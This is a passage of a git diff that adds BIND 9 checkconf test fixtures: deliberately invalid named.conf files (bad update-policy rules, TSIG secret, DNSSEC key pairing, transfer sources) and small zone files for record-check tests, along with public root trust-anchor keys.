https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + transfer-source-v6 fd92:7065:b8e:ffff::1 port 5300; +}; diff --git a/bin/tests/system/checkconf/bad-transfer-source.conf b/bin/tests/system/checkconf/bad-transfer-source.conf new file mode 100644 index 0000000..315c410 --- /dev/null +++ b/bin/tests/system/checkconf/bad-transfer-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + transfer-source 10.53.0.1 port 5300; +}; diff --git a/bin/tests/system/checkconf/bad-tsig.conf b/bin/tests/system/checkconf/bad-tsig.conf new file mode 100644 index 0000000..4af25b0 --- /dev/null +++ b/bin/tests/system/checkconf/bad-tsig.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* Bad secret */ +key "badtsig" { + algorithm hmac-md5; + secret "jEdD+BPKg=="; +}; + diff --git a/bin/tests/system/checkconf/bad-unpaired-keys.conf b/bin/tests/system/checkconf/bad-unpaired-keys.conf new file mode 100644 index 0000000..63b6dc2 --- /dev/null +++ b/bin/tests/system/checkconf/bad-unpaired-keys.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy unpaired-keys { + keys { + /* zsk without ksk */ + zsk lifetime 30d algorithm 13; + /* ksk without zsk */ + ksk lifetime 30d algorithm 7; + }; +}; + +zone "example" { + type primary; + file "example.db"; + dnssec-policy unpaired-keys; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy1.conf b/bin/tests/system/checkconf/bad-update-policy1.conf new file mode 100644 index 0000000..6eedd9d --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy1.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * self TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy10.conf b/bin/tests/system/checkconf/bad-update-policy10.conf new file mode 100644 index 0000000..29ed061 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy10.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * krb5-selfsub TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy11.conf b/bin/tests/system/checkconf/bad-update-policy11.conf new file mode 100644 index 0000000..8f9e873 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy11.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * ms-selfsub TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy12.conf b/bin/tests/system/checkconf/bad-update-policy12.conf new file mode 100644 index 0000000..1d42cdc --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy12.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * external TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy13.conf b/bin/tests/system/checkconf/bad-update-policy13.conf new file mode 100644 index 0000000..38973f6 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy13.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant a-key-name name TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy14.conf b/bin/tests/system/checkconf/bad-update-policy14.conf new file mode 100644 index 0000000..2cd0ef5 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy14.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant a-key-name subdomain TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy15.conf b/bin/tests/system/checkconf/bad-update-policy15.conf new file mode 100644 index 0000000..a2a354a --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy15.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant a-key-name wildcard TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy2.conf b/bin/tests/system/checkconf/bad-update-policy2.conf new file mode 100644 index 0000000..c83303f --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy2.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * selfsub TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy3.conf b/bin/tests/system/checkconf/bad-update-policy3.conf new file mode 100644 index 0000000..4856adb --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy3.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * selfwild TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy4.conf b/bin/tests/system/checkconf/bad-update-policy4.conf new file mode 100644 index 0000000..4bf1f5c --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy4.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * ms-self TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy5.conf b/bin/tests/system/checkconf/bad-update-policy5.conf new file mode 100644 index 0000000..a1853f8 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy5.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * krb5-self TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy6.conf b/bin/tests/system/checkconf/bad-update-policy6.conf new file mode 100644 index 0000000..b1ef09c --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy6.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * ms-subdomain TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy7.conf b/bin/tests/system/checkconf/bad-update-policy7.conf new file mode 100644 index 0000000..1469b94 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy7.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * krb5-subdomain TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy8.conf b/bin/tests/system/checkconf/bad-update-policy8.conf new file mode 100644 index 0000000..9e263ee --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy8.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * tcp-self TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-update-policy9.conf b/bin/tests/system/checkconf/bad-update-policy9.conf new file mode 100644 index 0000000..23fcb66 --- /dev/null +++ b/bin/tests/system/checkconf/bad-update-policy9.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * 6to4-self TXT; + }; +}; diff --git a/bin/tests/system/checkconf/bad-validation-auto-key.conf b/bin/tests/system/checkconf/bad-validation-auto-key.conf new file mode 100644 index 0000000..bd6f547 --- /dev/null +++ b/bin/tests/system/checkconf/bad-validation-auto-key.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-validation auto; +}; + +trust-anchors { + . static-key 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod + y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ + YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX + 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw + E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/ + Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn + 6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/bad-view-also-notify.conf b/bin/tests/system/checkconf/bad-view-also-notify.conf new file mode 100644 index 0000000..6dd9a4c --- /dev/null +++ b/bin/tests/system/checkconf/bad-view-also-notify.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view example { + also-notify { missing; }; + zone "example.net" { + type slave; + masters { 192.168.1.1; }; + }; +}; diff --git a/bin/tests/system/checkconf/bad-zsk-without-ksk.conf b/bin/tests/system/checkconf/bad-zsk-without-ksk.conf new file mode 100644 index 0000000..31b031c --- /dev/null +++ b/bin/tests/system/checkconf/bad-zsk-without-ksk.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy zsk-without-ksk { + keys { + zsk lifetime 30d algorithm 13; + }; +}; + +zone "example" { + type primary; + file "example.db"; + dnssec-policy zsk-without-ksk; +}; diff --git a/bin/tests/system/checkconf/check-dup-records-fail.conf b/bin/tests/system/checkconf/check-dup-records-fail.conf new file mode 100644 index 0000000..a655681 --- /dev/null +++ b/bin/tests/system/checkconf/check-dup-records-fail.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-integrity yes; // default is yes +}; + +zone "check-dup-records" { + type master; + file "check-dup-records.db"; + check-dup-records fail; +}; + diff --git a/bin/tests/system/checkconf/check-dup-records.db b/bin/tests/system/checkconf/check-dup-records.db new file mode 100644 index 0000000..558686c --- /dev/null +++ b/bin/tests/system/checkconf/check-dup-records.db @@ -0,0 +1,33 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + MX 10 mail + +mail A 10.0.0.1 +ns2 A 10.53.0.2 + +; following records are not de-duplicated +; and will be matched by check-dup-records +duplicate HIP ( 2 200100107B1A74DF365639CC39F1D578 + AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D + rvs.example.com. ) +duplicate HIP ( 2 200100107B1A74DF365639CC39F1D578 + AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D + RVS.example.com. ) diff --git a/bin/tests/system/checkconf/check-missing-zone.conf b/bin/tests/system/checkconf/check-missing-zone.conf new file mode 100644 index 0000000..e33ad54 --- /dev/null +++ b/bin/tests/system/checkconf/check-missing-zone.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view missing { + zone missing.example { + type master; + file "missing.example.db"; + }; +}; + +view good { + zone shared.example { + type master; + file "shared.example.db"; + }; +}; diff --git a/bin/tests/system/checkconf/check-mixed-keys.conf b/bin/tests/system/checkconf/check-mixed-keys.conf new file mode 100644 index 0000000..1dd018d --- /dev/null +++ b/bin/tests/system/checkconf/check-mixed-keys.conf @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (19036) is to be phased out starting in 2017. It will + # remain in the root zone for some time after its successor key + # has been added. It will remain this file until it is removed from + # the root zone. + . static-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF + FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX + bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD + X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz + W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS + Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq + QxA+Uk1ihz0="; +}; + +managed-keys { + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/bin/tests/system/checkconf/check-mx-cname-fail.conf b/bin/tests/system/checkconf/check-mx-cname-fail.conf new file mode 100644 index 0000000..611fb2c --- /dev/null +++ b/bin/tests/system/checkconf/check-mx-cname-fail.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-integrity yes; // default is yes +}; + +zone "check-mx-cname" { + type master; + file "check-mx-cname.db"; + check-mx-cname fail; +}; diff --git a/bin/tests/system/checkconf/check-mx-cname.db b/bin/tests/system/checkconf/check-mx-cname.db new file mode 100644 index 0000000..dc30f08 --- /dev/null +++ b/bin/tests/system/checkconf/check-mx-cname.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + MX 10 mail + +; MX points to a CNAME which is detected by check-mx-cname +mail CNAME ns2 + +ns2 A 10.53.0.2 diff --git a/bin/tests/system/checkconf/check-mx-fail.conf b/bin/tests/system/checkconf/check-mx-fail.conf new file mode 100644 index 0000000..408b1b4 --- /dev/null +++ b/bin/tests/system/checkconf/check-mx-fail.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-integrity yes; // default is yes +}; + +zone "check-mx" { + type master; + file "check-mx.db"; + check-mx fail; +}; diff --git a/bin/tests/system/checkconf/check-mx.db b/bin/tests/system/checkconf/check-mx.db new file mode 100644 index 0000000..dced644 --- /dev/null +++ b/bin/tests/system/checkconf/check-mx.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +; MX appears to be an address and will be detected by check-mx + MX 10 10.0.0.1 + +ns2 A 10.53.0.2 diff --git a/bin/tests/system/checkconf/check-names-fail.conf b/bin/tests/system/checkconf/check-names-fail.conf new file mode 100644 index 0000000..8137747 --- /dev/null +++ b/bin/tests/system/checkconf/check-names-fail.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-integrity yes; // default is yes +}; + +zone "check-names" { + type master; + file "check-names.db"; + check-names fail; +}; diff --git a/bin/tests/system/checkconf/check-names.db b/bin/tests/system/checkconf/check-names.db new file mode 100644 index 0000000..0274ec9 --- /dev/null +++ b/bin/tests/system/checkconf/check-names.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + MX 10 mail + +mail A 10.0.0.1 +ns2 A 10.53.0.2 + +; the RDATA of this record contains a name that may be considered +; invalid and will be detected by check-names configuration. +check-names SRV 1 2 3 _underscore diff --git a/bin/tests/system/checkconf/check-root-ksk-2010.conf b/bin/tests/system/checkconf/check-root-ksk-2010.conf new file mode 100644 index 0000000..d422635 --- /dev/null +++ b/bin/tests/system/checkconf/check-root-ksk-2010.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (19036) is to be phased out starting in 2017. It will + # remain in the root zone for some time after its successor key + # has been added. It will remain this file until it is removed from + # the root zone. + . initial-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF + FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX + bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD + X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz + W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS + Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq + QxA+Uk1ihz0="; +}; diff --git a/bin/tests/system/checkconf/check-root-ksk-2017.conf b/bin/tests/system/checkconf/check-root-ksk-2017.conf new file mode 100644 index 0000000..72f6fb4 --- /dev/null +++ b/bin/tests/system/checkconf/check-root-ksk-2017.conf @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + 